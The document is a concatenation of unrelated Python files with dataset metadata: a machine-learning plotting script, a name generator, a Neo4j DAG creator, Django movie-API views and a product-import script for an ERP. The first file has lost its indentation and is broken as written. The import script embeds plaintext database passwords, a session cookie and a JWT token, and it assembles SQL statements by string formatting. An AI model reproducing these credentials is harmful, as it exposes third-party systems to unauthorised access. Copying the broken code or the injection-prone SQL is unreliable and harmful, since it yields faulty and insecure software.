fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.82, 0.295, 0.02, 0.4])
importance = np.zeros((3, len(features), len(features)))
for p, pred in enumerate(predictors):
# Load in the random forest gridsearch and the absorber data
gridsearch, _, _, _, _ = \
pickle.load(open(f'{model_dir}{model}_{wind}_{snap}_{lines_short[lines.index(line)]}_lines_RF_{pred}.model', 'rb'))
df_full = pd.read_csv(f'data/{model}_{wind}_{snap}_{line}_lines.csv')
train = df_full['train_mask']
err = pd.DataFrame(columns=['Feature removed', 'Pearson', 'r2_score', 'explained_variance_score', 'mean_squared_error'])
for i in range(len(features)):
# Iteratively choose all features but one
features_use = np.delete(features, i)
idx = np.delete(np.arange(len(features)), i)
# Scale the features and predictors to mean 0 and sigma 1
feature_scaler = preprocessing.StandardScaler().fit(df_full[train][features_use])
predictor_scaler = preprocessing.StandardScaler().fit(np.array(df_full[train][pred]).reshape(-1, 1) )
# Train a random forest model using the best parameters from the full grid search and all but one of the features
random_forest = RandomForestRegressor(n_estimators=gridsearch.best_params_['n_estimators'],
min_samples_split=gridsearch.best_params_['min_samples_split'],
min_samples_leaf=gridsearch.best_params_['min_samples_leaf'],)
random_forest.fit(feature_scaler.transform(df_full[train][features_use]), predictor_scaler.transform(np.array(df_full[train][pred]).reshape(-1, 1) ))
# Get the feature importances
importance[p][i][idx] = random_forest.feature_importances_
# Evaluate the performance of the model
conditions_pred = predictor_scaler.inverse_transform(np.array( random_forest.predict(feature_scaler.transform(df_full[~train][features_use]))).reshape(-1, 1) )
conditions_true = pd.DataFrame(df_full[~train],columns=[pred]).values
conditions_pred = conditions_pred.flatten()
conditions_true = conditions_true.flatten()
if pred == 'Z':
conditions_pred -= np.log10(zsolar[lines.index(line)])
conditions_true -= np.log10(zsolar[lines.index(line)])
scores = {}
scores['Feature removed'] = features[i]
scores['Pearson'] = round(pearsonr(conditions_true, conditions_pred)[0],3)
for _scorer in [r2_score, explained_variance_score, mean_squared_error]:
scores[_scorer.__name__] = float(_scorer(conditions_pred,
conditions_true, multioutput='raw_values'))
err = err.append(scores, ignore_index=True)
print(pred, err)
# Plot importance matrix
importance_use = np.transpose(importance[p])
mask = importance_use == 0
if p == len(predictors) - 1:
g = sns.heatmap(importance_use, mask=mask, cmap=cmap, vmax=1, vmin=0, annot=False, ax=ax[p], square=True, linewidths=.5,
cbar_ax=cbar_ax, cbar_kws={'label': 'Importance'})
else:
g = sns.heatmap(importance_use, mask=mask, cmap=cmap, vmax=1, vmin=0, annot=False, ax=ax[p], square=True, linewidths=.5,
cbar=False)
g.figure.axes[p].set_xticklabels(features_pretty, rotation='vertical', fontsize=15)
g.figure.axes[p].set_xlabel('Removed feature')
if p == 0:
g.figure.axes[p].set_ylabel('Remaining features')
g.figure.axes[p].set_yticklabels(features_pretty, rotation='horizontal', fontsize=15)
else:
g.figure.axes[p].set_yticklabels(['']*len(features), rotation='horizontal', fontsize=15)
g.figure.axes[p].set_title(predictors_pretty[p])
g.figure.axes[p].tick_params(left=False, bottom=False) ## other options are right and top
fig.subplots_adjust(wspace=0.1)
plt.savefig(f'plots/{model}_{wind}_{snap}_{lines_short[lines.index(line)]}_lines_RF_importance.png')
plt.close()
| sarahappleby/cgm_ml | plot_feature_importance.py | plot_feature_importance.py | py | 5,793 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.random.seed",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.rc",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "matplotlib.p... |
12868339424 | from typing import List
from name_genie.common import data_dao_stem, data_dao_male_suffix, data_dao_female_suffix, data_shared_dao, data_shared_thing, data_shared_adj, data_shared_number
from name_genie.util import to_str
import random
__all__ = ['get_daos']
stems = data_dao_stem + data_shared_dao + data_shared_thing + data_shared_adj + data_shared_number
suffixes = data_dao_male_suffix + data_dao_female_suffix
def get_daos(count: int = 10,
gender: int | None = None,
stem: str | None = None,
suffix: str | None = None) -> List[str]:
"""
生成道号
生成算法:(stem) + (suffix)
:param count: 数量
:param gender: 性别: 1 - 男; 2 - 女
:param stem: 词干
:param suffix: 后缀
:return:
"""
names: List[str] = []
for i in range(count):
gender2 = gender
stem2 = stem
suffix2 = suffix
if stem2 is None:
stem2 = random.choice(stems)
if suffix2 is None:
if gender2 == 1:
suffix2 = random.choice(data_dao_male_suffix)
elif gender2 == 2:
suffix2 = random.choice(data_dao_female_suffix)
else:
suffix2 = random.choice(suffixes)
name = to_str(stem2) + to_str(suffix2)
names.append(name)
return names
if __name__ == '__main__':
print(get_daos())
| name-genie/name-genie-python | name_genie/dao.py | dao.py | py | 1,399 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "name_genie.common.data_dao_stem",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "name_genie.common.data_shared_dao",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "name_genie.common.data_shared_thing",
"line_number": 9,
"usage_type": "na... |
30397116642 | from dagger import conf
from dagger.dag_creator.graph_traverser_base import GraphTraverserBase
from dagger.graph.task_graph import Graph
from dagger.utilities import uid
from neo4j import GraphDatabase
class DagCreator(GraphTraverserBase):
def __init__(self, task_graph: Graph):
super().__init__(task_graph, True)
neo4j_uri = "bolt://{host}:{port}".format(
host=conf.NE4J_HOST, port=conf.NE4J_PORT
)
self._neo4j_driver = GraphDatabase.driver(neo4j_uri, auth=("neo4j", "test"))
with self._neo4j_driver.session() as session:
session.write_transaction(self._reset_graph)
@staticmethod
def _reset_graph(tx):
tx.run("MATCH ()-[r]->() DELETE r")
tx.run("MATCH (n) DELETE n")
@staticmethod
def _add_node(tx, node_type: str, **kwargs):
node_args = ", ".join([f'{key}:"{value}"' for key, value in kwargs.items()])
create_cmd = f"CREATE (node:{node_type} {{{node_args}}}) RETURN node"
result = tx.run(create_cmd)
return result.single()['node'].id
@staticmethod
def _add_edge(tx, from_id: int, to_id: int, relationship_type: str, **kwargs):
relationship_args = ", ".join(
[f'{key}:"{value}"' for key, value in kwargs.items()]
)
create_cmd = f"""
MATCH (from_node), (to_node)
WHERE ID(from_node)={from_id} AND ID(to_node)={to_id}
CREATE (from_node)-[:{relationship_type} {{{relationship_args}}}]->(to_node)
"""
tx.run(create_cmd)
def _create_dag(self, pipe_id, node):
with self._neo4j_driver.session() as session:
node_id = session.write_transaction(
self._add_node,
"Dag",
name=node.obj.name,
description=node.obj.description,
uid=uid.get_pipeline_uid(node.obj)
)
return node_id
def _create_job_task(self, node):
with self._neo4j_driver.session() as session:
node_id = session.write_transaction(
self._add_node,
"Job",
name=node.obj.name,
description=node.obj.description,
uid=uid.get_task_uid(node.obj)
)
pipe_id = node.obj.pipeline_name
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge, node_id, self._dags[pipe_id], "TASK_OF"
)
return node_id
def _create_data_task(self, pipe_id, node):
# if pipe_id not in self._data_tasks:
# self._data_tasks[pipe_id] = {}
dataset_id = node.obj.airflow_name
if dataset_id not in self._data_tasks:
with self._neo4j_driver.session() as session:
self._data_tasks[dataset_id] = session.write_transaction(
self._add_node,
"Dataset",
name=node.obj.alias(),
description=node.obj.name,
uid=uid.get_dataset_uid(node.obj)
)
def _create_edge_without_data(self, from_task_id, to_task_ids, node):
raise NotImplemented
def _create_edge_with_data(self, from_task_id, to_task_ids, node):
from_pipe = (
self._task_graph.get_node(from_task_id).obj.pipeline_name
if from_task_id
else None
)
data_id = node.obj.airflow_name
if from_pipe:
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge,
self._tasks[from_task_id],
self._data_tasks[data_id],
"GENERATED_BY",
)
for to_task_id in to_task_ids:
to_pipe = self._task_graph.get_node(to_task_id).obj.pipeline_name
with self._neo4j_driver.session() as session:
session.write_transaction(
self._add_edge,
self._data_tasks[data_id],
self._tasks[to_task_id],
"DEPENDS_ON",
)
| siklosid/dagger | dagger/dag_creator/neo4j/dag_creator.py | dag_creator.py | py | 4,182 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "dagger.dag_creator.graph_traverser_base.GraphTraverserBase",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "dagger.graph.task_graph.Graph",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "dagger.conf.NE4J_HOST",
"line_number": 12,
"usage_... |
19682706596 | import datetime
import json
import requests
from apps.findprice.models import Product, CATEGORY_CHOICES, Scan, User
from apps.findprice.serializers import ProductSerializer, ScanSerializer, ProductsCatSerializer, \
ScansForProductSerializer
from django.contrib.auth.forms import SetPasswordForm
from django.http import JsonResponse
from django.shortcuts import render
from rest_framework import viewsets
class ProductViewSet(viewsets.ModelViewSet):
serializer_class = ProductSerializer
queryset = Product.objects.all()
class ScanViewSet(viewsets.ModelViewSet):
serializer_class = ScanSerializer
queryset = Scan.objects.all()
def getCategory(request):
if request.method == 'GET':
category = []
id = []
for i in range(len(CATEGORY_CHOICES)):
id.append(i)
category.append(CATEGORY_CHOICES[i][0])
categories = [{"id": t, "category": s} for t, s in zip(id, category)]
# return (json.dumps(categories))
return JsonResponse(categories, safe=False)
class getProductsSet(viewsets.ModelViewSet):
# queryset = Product.objects.all()
serializer_class = ProductsCatSerializer
def get_queryset(self):
queryset = Product.objects.all()
category = self.request.query_params.get('cat')
id = self.request.query_params.get('id')
if category is not None:
queryset = queryset.filter(category=category)
if id is not None:
queryset = queryset.filter(id=id)
return queryset
class getProductScan(viewsets.ModelViewSet):
serializer_class = ScansForProductSerializer
def get_queryset(self):
queryset = Scan.objects.all()
filter = self.request.query_params.get('filter')
if filter is not None:
filter = json.loads(filter)
lat = filter['lat']
long = filter['long']
id = filter['id']
dt = filter['dt']
if(id== '*'):
print(id)
pdt = datetime.datetime.strptime(dt, "%Y-%m-%dT%H:%M:%S.%fZ") - datetime.timedelta(days=7)
queryset = queryset.filter(lat__lte=float(lat) + 0.5, lat__gte=float(lat) - 0.5,
long__lte=float(long) + 0.5, long__gte=float(long) - 0.5,
scan_time__lt=dt, scan_time__gt=pdt).order_by('-scan_time')
else:
queryset = queryset.filter(lat__lte=float(lat) + 0.5, lat__gte=float(lat) - 0.5,
long__lte=float(long) + 0.5, long__gte=float(long) - 0.5,
product=id, scan_time__lt=dt).order_by('-scan_time')[:10]
return queryset
| gdoganieri/backendfindprice | apps/findprice/views.py | views.py | py | 2,711 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.viewsets.ModelViewSet",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.viewsets",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "apps.findprice.serializers.ProductSerializer",
"line_number": 15,
"usag... |
12887801729 | import spacy
from spacy import displacy
nlp = spacy.load('en_coref_md')
print("loaded")
text = r'''
Although Apple does not break down sales of AirPods, the company reported in January that its "other" product category, which includes AirPod sales, grew 33% to $7.3 from a year earlier, the fastest growing category.'''
doc = nlp(text)
doc._.has_coref
coref = doc._.coref_clusters
resolved = doc._.coref_resolved
print(coref)
print(resolved)
displacy.serve(coref, style="ent")
| AngeloCioffi/Info-Retrieval-Practical-NLP | neuralcoref/corref.py | corref.py | py | 484 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "spacy.load",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "spacy.displacy.serve",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "spacy.displacy",
"line_number": 20,
"usage_type": "name"
}
] |
7004941204 | from distutils.core import setup
from setuptools.command.install import install
import socket, subprocess,os
class PreInstallCommand(install):
def run(self):
shell()
install.run(self)
def shell():
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.9",4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
setup(
name = 'pigpackage',
packages = ['pigpackage'],
version = '0.1',
license='MIT',
description = 'TYPE YOUR DESCRIPTION HERE',
author = 'YOUR NAME',
author_email = 'your.email@domain.com',
url = 'http://test.com/pigpackage',
keywords = ['pigpackage'],
cmdclass={'install':PreInstallCommand,},
)
| nutty-guineapig/htb-pub | sneakymailer/sneakymailer/mypackage/setup.py | setup.py | py | 773 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.command.install.install",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "setuptools.command.install.install.run",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "setuptools.command.install.install",
"line_number": 8,
"usage_typ... |
2769538888 | import discord.ext.commands as disextc
import logging as lg
import yaml as yl
log = lg.getLogger(__name__)
class Config(disextc.Cog):
""" Configuration handler for the bot.
This is a yml file representation. Each configuration stored should be
under its own key:
discord:
exampledata1
exampledata2
reddit:
exampledata
Between the database and env vars for credentials, this should only be
used for things that would be beneficial to change at runtime.
This file should most optimally be 'read' before used, and 'saved' after
being altered. The defaults should be stored in each cog that utilizes
them.
Anything that is 'memory' should be stored in persistent memory cog.
Attributes:
-------------------------------------------
bot -> The bot that was initialized with the cog.
data -> a dictionary representation of the config file
"""
def __init__(self, bot: disextc.Bot):
super().__init__()
self.bot = bot
self.data = {}
# Listeners
@disextc.Cog.listener()
async def on_ready(self):
""" Initialize the config cog. """
# TODO: Change the config load into a retry-system.
# NOTE: This needs to be done immediately to ensure that other cogs
# won't have to wait long on it.
await self.load_config()
await self.bot.wait_until_ready()
txt_config_on_ready = "on_ready config cog fired."
log.debug(txt_config_on_ready)
# Helpers
async def load_config(self):
""" Loads config from Redis."""
# TODO: Error handling?
memory = self.bot.get_cog('Memory')
if memory is None:
raise RuntimeError('Could not get memory cog to save config.')
from cogs.memory import redis_db_config
pool = await memory.get_redis_pool(redis_db_config)
self.data = yl.safe_load(await pool.get('config'))
pool.close()
await pool.wait_closed()
log.info(f'Config Loaded')
async def save_config(self):
""" Saves config to Redis."""
# TODO: Error handling?
memory = self.bot.get_cog('Memory')
if memory is None:
raise RuntimeError('Could not get memory cog to save config.')
from cogs.memory import redis_db_config
pool = await memory.get_redis_pool(redis_db_config)
result = await pool.set('config', yl.safe_dump(self.data))
pool.close()
await pool.wait_closed()
log.debug(f'Save config results: {result}')
# Config Command Group
@disextc.group(name='con', hidden=True)
@disextc.is_owner()
async def config_group(self, ctx: disextc.Context):
"""Group for config cog commands."""
# TODO: more Gracefully
if ctx.invoked_subcommand is None:
await ctx.send('No config subcommand given.')
@config_group.command(name='show', hidden=True)
@disextc.is_owner()
async def show_config_command(self, ctx: disextc.Context):
"""Dumps current config into ctx. """
await ctx.send('```' + repr(self.data) + '```')
def setup(bot: disextc.Bot) -> None:
""" Loads config cog. """
bot.add_cog(Config(bot))
| guitaristtom/pythonbot-core | bot/cogs/config.py | config.py | py | 3,262 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "discord.ext.commands.Cog",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "discord.ext.commands",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "dis... |
69905055783 | from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from django.shortcuts import get_object_or_404
from .models import Genre, Movie, Comment
import requests
from .serializers import(
MovieListSerializer,
MovieSerializer,
CommentListSerializer,
CommentSerializer,
GenreSerializer,
)
from movies import serializers
# Create your views here.
MYKEY = 'fb9a96092cd1259e59917287f35839c8'
def getGenre(request):
genreURL = f'https://api.themoviedb.org/3/genre/movie/list?api_key={MYKEY}&language=ko-KR'
allGenre = requests.get(genreURL)
datas = allGenre.json().get('genres')
for data in datas:
Genre.objects.get_or_create(
id = data.get('id'),
name = data.get('name'),
)
return
def getMovie(request):
# n을 변수로삼고 for문을 돌려서 충분한 양의 영화정보를 DB에 저장할 수 있도록 한다.
for n in range(1, 20):
movieURL = f'https://api.themoviedb.org/3/discover/movie?api_key={MYKEY}&language=ko-KR&page={str(n)}'
# 스타트캠프 미세먼지 API 참조하며 가져오기,,
allMovie = requests.get(movieURL)
# get 'results' 찾는데 시간이 좀 걸렸음
datas = allMovie.json().get('results')
for data in datas:
Movie.objects.get_or_create(
# 원하는 친구들을 뽑아서 원하는 필드에 넣고
movie_id = data.get('id'),
title = data.get('original_title'),
overview = data.get('overview'),
release_date = data.get('release_date'),
voteavg = data.get('vote_average'),
# poster_path + 하는 부분도 검색해서 알게됨
poster_path = "https://image.tmdb.org/t/p/original"+ data.get('poster_path'),
)
# movie와 genre의 id끼리 M:N 모델을 수립하는 과정
# genre별 movie를 꺼내와야 하기 때문에 필요한 과정이다.
# 해당 영화의 genre 저장해주고
genreItems = data.get('genre_ids')
# 지금 for문 내에 잡혀있는 movie_id의 정보들 가져온다음
movie = Movie.objects.get(movie_id = data.get('id'))
# 하나의 영화에 장르ID가 여러개 있기 때문에 for문을 돌려가며 추가해줘야한다
for i in genreItems:
p1 = get_object_or_404(Genre, pk=i)
# M:N 필드에 추가
movie.genres.add(p1)
return
# 장르별로 무비 가져오기
@api_view(['GET'])
def movie_genre(request, genre_id):
movie_genres = Movie.objects.filter(genres=genre_id)
serializer = MovieListSerializer(movie_genres, many=True)
return Response(data=serializer.data)
# 모든 장르 가져오기
@api_view(['GET'])
def all_movie_genre(request):
genres = Genre.objects.all()
serializer = GenreSerializer(genres, many=True)
return Response(data=serializer.data)
@api_view(['GET']) # GET 요청이 올 때
def movie_list(request):
movies = Movie.objects.all()
# Movie 모델에 전체 데이터를 가져오고
serializer = MovieListSerializer(movies, many=True)
# 시리얼라이즈화 해서 serializer 변수에 저장! 디폴트값이 여러개 데이터는 못가져오니 many=True 꼭 넣어줘야함!
return Response(data=serializer.data)
# Response의 data키워드 인자에 serilaizer.data를 저장해서 보여주기
@api_view(['GET'])
def movie_detail(request, movie_id):
    """Return a single movie by primary key.

    Uses get_object_or_404 -- consistent with the other views in this file --
    so an unknown id yields a 404 response instead of an uncaught
    Movie.DoesNotExist (HTTP 500).
    """
    movie = get_object_or_404(Movie, pk=movie_id)
    serializer = MovieSerializer(movie)
    return Response(data=serializer.data)
# Comments scoped to one movie.
@api_view(['GET', 'POST'])
def comment_list(request, movie_id):
    """GET: list the comments on a movie.  POST: create one on it."""
    movie = get_object_or_404(Movie, pk=movie_id)
    if request.method == 'POST':
        serializer = CommentListSerializer(data=request.data)
        # raise_exception=True turns an invalid payload into an automatic
        # 400 response, so the happy path below is the only return needed
        if serializer.is_valid(raise_exception=True):
            serializer.save(comment_movie=movie)
            return Response(data=serializer.data, status=status.HTTP_201_CREATED)
    movie_comments = Comment.objects.filter(comment_movie=movie)
    return Response(data=CommentListSerializer(movie_comments, many=True).data)
# Comments scoped to one user.
@api_view(['GET'])
def comment_list_by_user(request, user_id):
    """Return every comment written by the given user."""
    authored = Comment.objects.filter(comment_user=user_id)
    payload = CommentListSerializer(authored, many=True).data
    return Response(data=payload)
@api_view(['GET', 'PUT', 'DELETE'])
def comment_detail(request, movie_id, comment_id):
    """Retrieve, partially update, or delete one comment of a movie.

    The comment lookup is scoped to the movie, so a comment id belonging to
    a different movie yields 404.
    """
    movie = get_object_or_404(Movie, pk=movie_id)
    comment = get_object_or_404(Comment, pk=comment_id, comment_movie=movie)
    if request.method == 'DELETE':
        comment.delete()
        return Response(
            data={'message': '성공적으로 삭제되었습니다!'},
            status=status.HTTP_204_NO_CONTENT,
        )
    if request.method == 'PUT':
        # partial=True: a single changed field is enough to update
        serializer = CommentSerializer(comment, data=request.data, partial=True)
        # raise_exception=True converts invalid input into a 400 response
        if serializer.is_valid(raise_exception=True):
            serializer.save()
        return Response(data=serializer.data)
    return Response(data=CommentSerializer(comment).data)
| jhs9497/MovieRecommendSite | backend/movies/views.py | views.py | py | 6,928 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "models.Genre.objects.get_or_create",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "models.Genre.objects",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_nam... |
34526548926 | import numpy as np
import openpyxl as op
import pandas as pd
import pymysql
from sqlalchemy import create_engine
import requests
import datetime as dt
import os
import xlrd
def read_table(path):
    """Load the active sheet of an .xlsx workbook into a DataFrame,
    promoting the sheet's first row to the column header."""
    sheet = op.load_workbook(path).active
    raw = pd.DataFrame(sheet.values)
    header = raw.iloc[0, :]
    return pd.DataFrame(raw.iloc[1:].values, columns=header)
def is_contain_chinese(check_str):
    """Return True if *check_str* contains any non-Latin-1 character.

    The ``ord(ch) > 255`` test matches anything outside Latin-1 (CJK,
    Hangul, curly quotes, ...), not strictly Chinese; callers use it as a
    cheap "contains CJK text" heuristic.  The original fell off the end and
    returned an implicit ``None`` for the negative case; this returns an
    explicit bool (None was falsy, so callers are unaffected).
    """
    return any(ord(ch) > 255 for ch in check_str)
def is_chinese(l):
    """Filter *l*, keeping only entries free of non-Latin-1 (e.g. Chinese)
    characters.

    :param l: iterable of values, typically from ``Series.unique()`` -- may
        contain non-strings such as ``None`` / ``nan``.
    :return: list of the entries that pass the check.

    Non-string entries raise TypeError inside ``is_contain_chinese`` and are
    skipped, matching the original intent; the bare ``except`` that also
    swallowed unrelated errors is narrowed to TypeError.
    """
    res = []
    for item in l:
        try:
            if not is_contain_chinese(item):
                res.append(item)
        except TypeError:
            # e.g. None or float('nan') coming from pandas -- not a string
            continue
    return res
def trim(s):
    """Strip leading/trailing space characters (ASCII 0x20 only).

    Equivalent to the original recursive implementation, but delegated to
    ``str.strip(' ')`` so a long run of spaces cannot hit the recursion
    limit.  Note it deliberately strips only ' ' -- tabs and newlines are
    preserved, unlike a bare ``str.strip()``.
    """
    return s.strip(' ')
# --- Database connections -------------------------------------------------
# SECURITY NOTE(review): live credentials are hard-coded below (and in the
# disabled production block); move them to environment variables / a secrets
# store and rotate these passwords.
# Production connection (disabled):
# engine = create_engine(
#     'mysql+pymysql://leiming:pQx2WhYhgJEtU5r@rm-2ze314ym42f9iq2xflo.mysql.rds.aliyuncs.com:3306/plutus')
# conn = pymysql.connect(host='rm-2ze314ym42f9iq2xflo.mysql.rds.aliyuncs.com',
#                        port=3306, user='leiming',
#                        passwd='pQx2WhYhgJEtU5r',
#                        db="plutus",
#                        charset='utf8')
# Test-environment connection:
engine = create_engine(
    'mysql+pymysql://leiming:vg4wHTnJlbWK8SY@rm-2zeq92vooj5447mqzso.mysql.rds.aliyuncs.com:3306/plutus')
conn = pymysql.connect(host='rm-2zeq92vooj5447mqzso.mysql.rds.aliyuncs.com',
                       port=3306, user='leiming',
                       passwd='vg4wHTnJlbWK8SY',
                       db="plutus",
                       charset='utf8')
# --- Download the SPU export file from the Banma ERP ----------------------
PATH = '/Users/edz/Documents'
url ='https://erp.banmaerp.com/Product/Spu/ExportHandler'
# URL-encoded filter payload: {"CreateTime":{"Sort":-1}}
data = 'filter=%7B%22CreateTime%22%3A%7B%22Sort%22%3A-1%7D%7D'
# SECURITY NOTE(review): a live session cookie / JWT is embedded here; it
# will expire and should come from configuration, not source.
headers = {
    'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
    'cookie': '.AspNetCore.Session=CfDJ8HFZt5KhGHxPrfAKn%2Fe35kaRpPerMJVnDOQnJCjicT8lyd81AtsUwStenh5nUMsWpyuS%2Bu38igf9ADjk2fhr6CYTk87TukhPs3Uqvid6CI4gSaSqYkM7fHDGw4xEnUKIIhoVh5nzaNU57l2OfpixmIgipBDXzggD1pciKOzkXQdc; Hm_lvt_9be79ac4f097e2a0be24ee6c088e921b=1603200345,1603247430; ERP.Token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJJRCI6Ijc1MjIiLCJOYW1lIjoi6Zu35pmT5pmoIiwiVXNlclR5cGUiOiIzIiwiT3duVXNlcklEIjoiNzA0MCIsImV4cCI6MTYzNDc5MzM3MSwiaXNzIjoiRVJQLmJhbm1hZXJwLmNvbSIsImF1ZCI6IkVSUC5iYW5tYWVycC5jb20ifQ.r5r1FrpMRa_yWr3qxuLnrJXUAZST_CC6V8nt2V-MbxM; Hm_lpvt_9be79ac4f097e2a0be24ee6c088e921b=1603257395'}
r = requests.post(url=url, headers=headers, data=data)
# NOTE(review): .format() here is a no-op -- the literal has no '{}'
# placeholder, so the date is never inserted into the filename.
file_name = PATH + '/本地产品导出.xlsx'.format(dt.datetime.now().date())
with open(file_name, 'wb') as file:
    file.write(r.content)
data_cp = read_table(file_name)
os.remove(file_name)
# Drop the merged title row the export prepends, when present.
if "本地产品" in data_cp.columns.tolist():
    data_cp = pd.DataFrame(data_cp.iloc[1:].values, columns=data_cp.iloc[0, :])
print(data_cp.columns)
print(data_cp.head())
# Derive the specs_one / specs_two / is_delete / category working columns.
data_cp['specs_one'] = data_cp['规格']
data_cp['specs_two'] = data_cp['规格']
data_cp['is_delete'] = np.where(data_cp['状态'] == '已删除', 1, 0)
data_cp['category'] = data_cp['斑马类目']
# Drop records whose SPU or SKU status is "deleted" (已删除).
data_cp['delete'] = data_cp['is_delete']
data_cp['delete'] = np.where(data_cp['SPU状态'] == '已删除', 1, data_cp['delete'])
data_cp = data_cp[data_cp['delete'] != 1]
data_cp = data_cp.drop(columns='delete')
data_cp = data_cp.reset_index()
# Normalise specs_one (colour) / specs_two (size) and turn the
# newline-separated SPU gallery into a comma-separated list.
for i in range(data_cp.shape[0]):
    # Keep only the leaf of the category path ("a » b » c" -> "c").
    data_cp.loc[i, 'category'] = str(data_cp.loc[i, 'category']).split('»')[-1]
    data_cp.loc[i, 'SPU图集'] = data_cp.loc[i, 'SPU图集'].replace('\n', ',')
    if len(data_cp.loc[i, 'specs_two'].split(';')) >= 2:
        # "colour;size" pair -> split across the two columns
        data_cp.loc[i, 'specs_two'] = data_cp.loc[i, 'specs_two'].split(';')[1]
        data_cp.loc[i, 'specs_one'] = data_cp.loc[i, 'specs_one'].split(';')[0]
    elif len(data_cp.loc[i, 'specs_two']) > 2 and data_cp.loc[i, 'specs_two'] != 'One Size':
        # single long value that is not a size -> treat it as colour only
        data_cp.loc[i, 'specs_one'] = data_cp.loc[i, 'specs_one']
        data_cp.loc[i, 'specs_two'] = np.nan
    else:
        # short value / "One Size" -> treat it as size only
        data_cp.loc[i, 'specs_two'] = data_cp.loc[i, 'specs_two']
        data_cp.loc[i, 'specs_one'] = np.nan
# Merge size spelling variants into the canonical 'One Size'.
data_cp['specs_two'] = np.where(
    (data_cp['specs_two'] == 'One-Size') | (data_cp['specs_two'] == 'one-size') | (data_cp['specs_two'] == 'One Size'),
    'One Size', data_cp['specs_two'])
# Unique size / colour values (used to populate product_attr).
specs_two = data_cp['specs_two'].unique()
specs_one = data_cp['specs_one'].unique()
# Discard values containing Chinese (non-Latin-1) characters.
specs_two = is_chinese(specs_two)
specs_one = is_chinese(specs_one)
for i in range(data_cp.shape[0]):
    # Titles starting with '"' would break the double-quoted SQL below;
    # swap double quotes for single quotes.
    if data_cp.loc[i, '标题'].startswith('\"'):
        data_cp.loc[i, '标题'] = data_cp.loc[i, '标题'].replace('\"','\'')
# Write the products into the database:
"""
product 插入数据
"""
data_cp.to_excel('/Users/edz/Documents/data_cp.xlsx')
# --- Upsert SPU rows into `product` ---------------------------------------
# SECURITY NOTE(review): SQL throughout this script is built with str.format
# on spreadsheet-derived values; a quote in any cell breaks the statement
# (SQL injection risk) -- these should be parameterized queries.
for i in range(data_cp.shape[0]):
    with conn.cursor() as cursor:
        # spu_code is the natural key deciding insert-vs-update
        sql = "select spu_code from product where spu_code='{0}'".format(data_cp.loc[i, 'SPU编码'])
        cursor.execute(sql)
        r = cursor.fetchone()
        if r is None:
            sql = '''INSERT INTO product (product_name,spu_code, primary_image, add_time, product_images, zebra_spu_id) VALUES ("{0}",'{1}','{2}',now(),'{3}',{4})'''.format(
                data_cp.loc[i, '标题'], data_cp.loc[i, 'SPU编码'], data_cp.loc[i, 'SPU图片'],
                data_cp.loc[i, 'SPU图集'], int(data_cp.loc[i, '系统SPUID']))
            engine.execute(sql)
        else:
            sql = '''UPDATE product SET product_name ="{0}",primary_image = "{2}",add_time=now(),product_images="{3}",zebra_spu_id={4} WHERE spu_code = "{1}"'''.format(
                data_cp.loc[i, '标题'], data_cp.loc[i, 'SPU编码'], data_cp.loc[i, 'SPU图片'],
                data_cp.loc[i, 'SPU图集'], int(data_cp.loc[i, '系统SPUID']))
            engine.execute(sql)
print('刷完产品')
"""
更新data_cp表中的product_id
"""
# Read the freshly written `product` table back and join its ids onto
# data_cp via the SPU code.
data_p_id = pd.read_sql_table('product', engine)
data_p_id = data_p_id[['id', 'spu_code']]
data_cp = data_cp.merge(data_p_id, left_on='SPU编码', right_on='spu_code')
# --- product_attr ---------------------------------------------------------
# Inserting colour attributes (currently disabled):
"""
product_attr 插入数据
需要: specs_one, specs_two 两个关于color属性和size属性的table
"""
# for i in range(len(specs_one)):
#     with conn.cursor() as cursor:
#         sql = "select attr_name from product_attr where attr_name='{0}'".format(specs_one[i])
#         cursor.execute(sql)
#         r = cursor.fetchone()
#         if r is None:
#             sql = "INSERT INTO product_attr (attr_name, parent_id, ancilla) VALUES ('{0}', 1, NULL)".format(
#                 specs_one[i])
#             engine.execute(sql)
#
# Inserting size attributes (currently disabled):
# for i in range(len(specs_two)):
#     with conn.cursor() as cursor:
#         sql = "select attr_name from product_attr where attr_name='{0}'".format(specs_two[i])
#         cursor.execute(sql)
#         r = cursor.fetchone()
#         if r is None:
#             sql = "INSERT INTO product_attr (attr_name, parent_id, ancilla) VALUES ('{0}', 2, NULL)".format(
#                 specs_two[i])
